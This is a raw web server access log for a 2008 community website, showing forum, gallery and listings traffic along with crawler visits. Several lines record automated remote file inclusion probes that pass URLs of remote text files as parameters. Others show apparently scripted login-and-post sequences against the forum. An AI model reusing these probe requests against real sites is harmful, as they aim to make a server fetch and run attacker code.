90.151.134.56 - - [15/Nov/2008:04:54:04 -0800] "GET /jodera2/templates/Cobalt/images/background.jpg HTTP/1.1" 200 8970 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:04 -0800] "GET /jodera2/templates/Cobalt/images/border_ltop.gif HTTP/1.1" 200 73 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:04 -0800] "GET /jodera2/templates/Cobalt/images/border_hside.gif HTTP/1.1" 200 55 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:04 -0800] "GET /jodera2/templates/Cobalt/images/border_rtop.gif HTTP/1.1" 200 101 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:04 -0800] "GET /jodera2/templates/Cobalt/images/border_vside.gif HTTP/1.1" 200 57 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:05 -0800] "GET /jodera2/templates/Cobalt/images/mainbox_bg.jpg HTTP/1.1" 200 8538 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:05 -0800] "GET /jodera2/templates/Cobalt/images/catbox_background.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:54:05 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32680&sid=d8bfe2e11c3cba87bf5fda08fc2a6705" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:05 -0800] "GET /jodera2/templates/Cobalt/images/catbox_bg_start.gif HTTP/1.1" 200 1105 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:05 -0800] "GET /jodera2/templates/Cobalt/images/cellpicsilver.gif HTTP/1.1" 200 190 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:54:06 -0800] "GET /jodera2/posting.php?mode=reply&t=32680&sid=d8bfe2e11c3cba87bf5fda08fc2a6705 HTTP/1.0" 200 50758 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32680&sid=d8bfe2e11c3cba87bf5fda08fc2a6705" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:06 -0800] "GET /jodera2/templates/Cobalt/images/border_lmiddle.gif HTTP/1.1" 200 70 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:06 -0800] "GET /jodera2/templates/Cobalt/images/border_rmiddle.gif HTTP/1.1" 200 69 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:12 -0800] "GET /jodera2/templates/Cobalt/images/formpic.gif HTTP/1.1" 200 892 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:12 -0800] "GET /jodera2/templates/Cobalt/images/buttonbgpic.gif HTTP/1.1" 200 186 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:12 -0800] "GET /jodera2/templates/Cobalt/images/border_lbottom.gif HTTP/1.1" 200 100 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:54:12 -0800] "GET /jodera2/templates/Cobalt/images/border_rbottom.gif HTTP/1.1" 200 101 "http://www.sancarloscity.org/jodera2/templates/Cobalt/Cobalt.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:54:22 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32680&sid=d8bfe2e11c3cba87bf5fda08fc2a6705" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:54:24 -0800] "GET /jodera2/viewtopic.php?p=42457 HTTP/1.0" 200 81480 "http://www.sancarloscity.org/viewtopic.php?p=42457#42457" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; XMPP Tiscali Communicator v.10.0.2; .NET CLR 2.0.50727)" "www.sancarloscity.org"
124.105.11.188 - - [15/Nov/2008:04:54:46 -0800] "GET /pictures/pics/ HTTP/1.1" 200 6952 "http://search.yahoo.com/search?p=san+julio+realty+inc." "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
124.105.11.188 - - [15/Nov/2008:04:54:47 -0800] "GET /pictures/pics/citycenter.png HTTP/1.1" 200 125102 "http://www.sancarloscity.org/pictures/pics/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
124.105.11.188 - - [15/Nov/2008:04:54:48 -0800] "GET /pictures/pics/businesspark.png HTTP/1.1" 200 563393 "http://www.sancarloscity.org/pictures/pics/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
72.249.33.216 - - [15/Nov/2008:04:54:48 -0800] "GET /logs/access_081103.log/?sourcedir=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 759 "-" "libwww-perl/5.808" "www.sancarloscity.org"
72.249.33.216 - - [15/Nov/2008:04:54:49 -0800] "GET /logs/?sourcedir=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 200 73593 "-" "libwww-perl/5.808" "www.sancarloscity.org"
124.105.11.188 - - [15/Nov/2008:04:54:54 -0800] "GET /pictures/pics/southvilla.png HTTP/1.1" 200 570711 "http://www.sancarloscity.org/pictures/pics/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:55:11 -0800] "GET /favicon.ico HTTP/1.1" 404 739 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
208.111.154.16 - - [15/Nov/2008:04:55:14 -0800] "GET /picgallery/displayimage.php?album=lastup&cat=4&pos=4 HTTP/1.1" 200 10226 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
90.151.134.56 - - [15/Nov/2008:04:55:14 -0800] "GET /favicon.ico HTTP/1.1" 404 739 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4" "sancarloscity.org"
82.99.30.11 - - [15/Nov/2008:04:55:15 -0800] "GET /jodera2/groupcp.php?sid=84059ed526dca3e65d3f9846281b732c HTTP/1.0" 200 17496 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
124.105.11.188 - - [15/Nov/2008:04:55:29 -0800] "GET /pictures/pics/centermall.png HTTP/1.1" 200 785888 "http://www.sancarloscity.org/pictures/pics/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
124.105.11.188 - - [15/Nov/2008:04:55:38 -0800] "GET /pictures/pics/sanjulio.png HTTP/1.1" 200 92002 "http://www.sancarloscity.org/pictures/pics/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
119.63.194.122 - - [15/Nov/2008:04:55:39 -0800] "GET /jodera2/viewtopic.php?p=39244 HTTP/1.1" 200 33241 "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)" "www.sancarloscity.org"
72.249.33.216 - - [15/Nov/2008:04:55:56 -0800] "GET /logs/access_080929.log/?sourcedir=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 759 "-" "libwww-perl/5.808" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:04:56:01 -0800] "GET /forum2/index.php?showtopic=159&mode=linear HTTP/1.0" 200 9179 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
124.105.11.188 - - [15/Nov/2008:04:56:11 -0800] "GET /favicon.ico HTTP/1.1" 404 739 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
88.2.188.74 - - [15/Nov/2008:04:56:27 -0800] "GET /?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 44225 "-" "libwww-perl/5.805" "www.sancarloscity.org"
88.2.188.74 - - [15/Nov/2008:04:56:27 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
88.2.188.74 - - [15/Nov/2008:04:56:30 -0800] "GET /logs//?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 73598 "-" "libwww-perl/5.805" "www.sancarloscity.org"
88.2.188.74 - - [15/Nov/2008:04:57:03 -0800] "GET /logs/access_080918.log//?custompluginfile[]=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 760 "-" "libwww-perl/5.805" "www.sancarloscity.org"
89.186.1.54 - - [15/Nov/2008:04:57:04 -0800] "GET /logs/access_081013.log/errors.php?error=http://www.keoeeit.com/go/arab.txt? HTTP/1.1" 404 769 "-" "libwww-perl/5.800" "www.sancarloscity.org"
89.186.1.54 - - [15/Nov/2008:04:57:05 -0800] "GET /errors.php?error=http://www.keoeeit.com/go/arab.txt? HTTP/1.1" 404 759 "-" "libwww-perl/5.800" "www.sancarloscity.org"
89.186.1.54 - - [15/Nov/2008:04:57:05 -0800] "GET /logs/errors.php?error=http://www.keoeeit.com/go/arab.txt? HTTP/1.1" 404 764 "-" "libwww-perl/5.800" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:04:57:07 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:04:57:08 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=edf1512abb21d33a8e0f5404c9454b05 HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=edf1512abb21d33a8e0f5404c9454b05" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:04:57:09 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=edf1512abb21d33a8e0f5404c9454b05" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:04:57:10 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=edf1512abb21d33a8e0f5404c9454b05 HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=edf1512abb21d33a8e0f5404c9454b05" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "www.sancarloscity.org"
67.195.37.186 - - [15/Nov/2008:04:57:11 -0800] "GET /advertise HTTP/1.0" 200 13778 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
67.195.37.186 - - [15/Nov/2008:04:57:11 -0800] "GET /antenna.css HTTP/1.0" 200 1748 "http://www.sancarloscity.org/advertise" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:04:57:22 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=edf1512abb21d33a8e0f5404c9454b05" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "www.sancarloscity.org"
89.149.202.60 - - [15/Nov/2008:04:57:23 -0800] "GET /jodera2/viewtopic.php?p=42458 HTTP/1.0" 200 31341 "http://www.sancarloscity.org/viewtopic.php?p=42458#42458" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00" "www.sancarloscity.org"
82.99.30.54 - - [15/Nov/2008:04:57:23 -0800] "GET /jodera2/profile.php?mode=editprofile&sid=84059ed526dca3e65d3f9846281b732c HTTP/1.0" 302 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
61.247.222.54 - - [15/Nov/2008:04:57:26 -0800] "GET /robots.txt HTTP/1.1" 200 44 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.sancarloscity.org"
61.247.222.54 - - [15/Nov/2008:04:57:27 -0800] "GET /jodera2/viewtopic.php?p=31003 HTTP/1.1" 200 84808 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:46 -0800] "GET /listings/listing/results.php?category_id=739 HTTP/1.1" 200 24443 "http://search.yahoo.com/search?p=unitop+department&vc=&fr=yfp-t-501&toggle=1&cop=mss&ei=UTF-8&fp_ip=PH" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:46 -0800] "GET /listings/layout/general_structure.css HTTP/1.1" 200 28444 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:48 -0800] "GET /listings/layout/general_noimage.css HTTP/1.1" 200 89 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:49 -0800] "GET /listings/layout/listing_result.css HTTP/1.1" 200 12330 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:50 -0800] "GET /listings/layout/listing_color.css HTTP/1.1" 200 4496 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:51 -0800] "GET /listings/layout/color/white_blue.css HTTP/1.1" 200 24170 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:04:57:51 -0800] "GET /forum2/index.php?showtopic=213&view=old HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:53 -0800] "GET /listings/scripts/common.js HTTP/1.1" 200 5162 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:54 -0800] "GET /listings/scripts/location.js HTTP/1.1" 200 4102 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:04:57:54 -0800] "GET /forum2/index.php?s=5b960985f9e28bba26242766e1c566c3&showtopic=162 HTTP/1.0" 200 28254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:54 -0800] "GET /listings/scripts/menusearch.js HTTP/1.1" 200 614 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:55 -0800] "GET /listings/scripts/contactclick.js HTTP/1.1" 200 1110 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:55 -0800] "GET /listings/scripts/cookies.js HTTP/1.1" 200 2224 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:56 -0800] "GET /listings/images/color/white_blue/img_logo.gif HTTP/1.1" 200 18765 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:56 -0800] "GET /listings/images/content/bullet_viewQuickList.gif HTTP/1.1" 200 431 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:57 -0800] "GET /listings/images/design/bullet_headerLogin.gif HTTP/1.1" 200 57 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:57 -0800] "GET /listings/images/design/bg_navbar_businessOn.gif HTTP/1.1" 200 43 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:57 -0800] "GET /listings/images/design/bg_CATbullet.gif HTTP/1.1" 200 49 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:58 -0800] "GET /listings/images/design/bullet_listingSubCAT.gif HTTP/1.1" 200 54 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:58 -0800] "GET /listings/images/design/img_rateSmallStarOff.gif HTTP/1.1" 200 607 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:57:59 -0800] "GET /favicon.ico HTTP/1.1" 404 739 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:58:14 -0800] "GET /listings/listing/results.php?category_id=699 HTTP/1.1" 200 31525 "http://www.sancarloscity.org/listings/listing/results.php?category_id=739" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
124.217.31.12 - - [15/Nov/2008:04:58:33 -0800] "GET /listings/listing/results.php?letter=a&category_id=699 HTTP/1.1" 200 24777 "http://www.sancarloscity.org/listings/listing/results.php?category_id=699" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.sancarloscity.org"
72.30.78.248 - - [15/Nov/2008:04:58:38 -0800] "GET /qphotogallery/thumbnails.php?album=35&page=1&sort=dd HTTP/1.0" 200 24877 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "sancarloscity.org"
72.249.33.216 - - [15/Nov/2008:04:58:56 -0800] "GET /errors.php?error=http://www.soaresdacosta.pt/readme.txt?? HTTP/1.1" 404 759 "-" "libwww-perl/5.808" "www.sancarloscity.org"
82.99.30.39 - - [15/Nov/2008:05:00:36 -0800] "GET /jodera2/viewtopic.php?p=33729 HTTP/1.0" 200 83407 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:01:20 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:01:20 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=d051b06185058b66492af986be26be29 HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=d051b06185058b66492af986be26be29" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:01:22 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=d051b06185058b66492af986be26be29" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:01:22 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=d051b06185058b66492af986be26be29 HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=d051b06185058b66492af986be26be29" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:01:28 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=d051b06185058b66492af986be26be29" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
89.149.196.210 - - [15/Nov/2008:05:01:29 -0800] "GET /jodera2/viewtopic.php?p=42459#42459 HTTP/1.0" 200 31343 "http://www.sancarloscity.org/viewtopic.php?p=42459#42459" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
200.57.157.28 - - [15/Nov/2008:05:01:49 -0800] "GET /logs/access_081013.log/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 769 "-" "libwww-perl/5.65" "www.sancarloscity.org"
84.16.230.111 - - [15/Nov/2008:05:01:58 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Opera/8.01 (Windows NT 5.1)" "www.sancarloscity.org"
200.57.157.28 - - [15/Nov/2008:05:01:59 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 759 "-" "libwww-perl/5.65" "www.sancarloscity.org"
200.57.157.28 - - [15/Nov/2008:05:01:59 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 764 "-" "libwww-perl/5.65" "www.sancarloscity.org"
84.16.230.111 - - [15/Nov/2008:05:01:59 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=35b2e185a3b6bd80c7ca42dea24ff8bb HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=35b2e185a3b6bd80c7ca42dea24ff8bb" "Opera/8.01 (Windows NT 5.1)" "www.sancarloscity.org"
84.16.230.111 - - [15/Nov/2008:05:02:00 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=35b2e185a3b6bd80c7ca42dea24ff8bb" "Opera/8.01 (Windows NT 5.1)" "www.sancarloscity.org"
